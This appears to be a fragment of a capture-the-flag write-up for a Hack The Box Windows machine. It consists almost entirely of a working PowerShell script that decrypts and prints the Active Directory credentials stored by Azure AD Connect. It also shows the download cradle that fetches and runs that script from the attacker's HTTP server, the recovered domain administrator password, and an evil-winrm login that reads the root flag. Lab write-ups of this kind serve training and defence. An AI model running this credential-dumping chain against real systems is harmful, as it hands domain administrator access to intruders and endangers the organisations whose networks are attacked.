$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
$ python -m http.server 8081*Evil-WinRM* PS C:\Users> iex(new-object net.webclient).downloadstring('http://10.10.14.3:8081/root.ps1')
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!root flag
$ evil-winrm -i 10.129.228.111 -u administrator -p 'd0m@in4dminyeah!'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
'HTB/Windows' Related Articles
more
